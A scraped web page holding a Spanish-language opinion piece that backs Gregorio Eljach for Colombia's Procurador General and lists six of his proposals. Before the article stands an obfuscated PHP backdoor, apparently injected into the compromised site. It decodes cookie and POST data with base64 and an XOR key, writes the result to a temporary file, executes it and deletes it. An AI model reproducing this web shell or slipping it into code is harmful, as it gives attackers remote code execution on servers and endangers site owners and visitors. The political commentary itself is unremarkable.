$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> 6 razones para elegir a un Procurador. – www.interferencechannel.com

6 razones para elegir a un Procurador.


Por Sebastián Cardona Sierra.

Egresado de Medios Audiovisuales con énfasis en dirección y producción de cine del Politécnico Grancolombiano

La Procuraduría General de la República, cómo los demás órganos de control en un país apabullado por la corrupción, demanda correctivos  y reformas permanentes para que responda con eficiencia a la naturaleza de su misión.

En esencia el Procurador es el censor y vigilante de los funcionarios del estado y tiene facultades para sancionar disciplinariamente desde el más humilde de ellos, hasta el propio Presidente de la Republica.

De ahí que su rol en la lucha contra la corrupción, fenómeno que en la actual emergencia sanitaria alcanzó vergonzosos niveles de pandemia, es fundamental y definitivo. La Procuraduría es guardián de la moral pública. Defensora de los ciudadanos, de la sociedad en su conjunto.

Por estos días el país sigue con interés, el proceso de selección de los candidatos a suceder a Fernando Carrillo- célebre impulsor hace 30 años de la Papeleta que condujo a la Asamblea  Nacional Constituyente- en la jefatura del Ministerio Público.

Movidos por esa inquietud, nos dispusimos a observar por televisión la audiencia virtual en la cual el Consejo de Estado, que tradicionalmente logra la elección de su ternado a la Procuraduría en el Senado de la República, escuchó a sus diez preseleccionados.

Los hubo de todos los colores y estilos. Arrogantes, presuntuosos académicos, sobrios y atildados. Pero al final, nos inclinamos por el tono y la propuesta innovadora y sería de, Gregorio Eljach Pacheco.

Estos seis puntos, tomados al vuelo, en su breve intervención de diez minutos, se resumen así, en palabras del Candidato Eljach:

  1. Procuraduría para la Plenitud Humana

“Defenderé el hábitat, el entorno, el sustrato donde el ser humano vive en sociedad”

  • Conciencia Ambiental

“Somos la generación responsable de garantizar la subsistencia digna de las generaciones venideras. Sin planeta no hay derechos que proteger.

Me ocuparé decididamente de intervenir en la protección del entorno vital”

  • Tecnología al servicio de la prevención.

“Haré uso de la analítica de datos e inteligencia artificial para actuar en tiempo real y mejorar la eficiencia de la Procuraduría en la lucha contra la corrupción”

  • Disminuir La carga de la Rama Judicial

“Potenciaré la conciliación como figura efectiva para la resolución de conflictos”

  • Agilizar la Justicia

“Los ciudadanos merecen una justicia ágil, eficiente y oportuna. Implementaré las salas de descongestión, para fortalecer los mecanismos de terminación anticipada de los conflictos y así, agilizar la justicia.”

  • Articulación interinstitucional

“Me comprometo a dedicar toda la capacidad de gestión, que he labrado con mi experiencia en el Congreso de la República, para contribuir con el Consejo de Estado, con las altas cortes, y con las demás instituciones, al diseño de las mejores soluciones de tipo legislativo, en el orden constitucional, y en el orden legal en cualquier tipo de leyes.”

Seductora la propuesta de Eljach. Que se mostró además como un hombre con el carácter y personalidad suficientes para liderar  una gestión exitosa como Procurador. Tiene el espíritu joven y la vocación reformista que exige la nueva realidad de la post pandemia. El Consejo de Estado haría bien en ternarlo.

Comments are closed.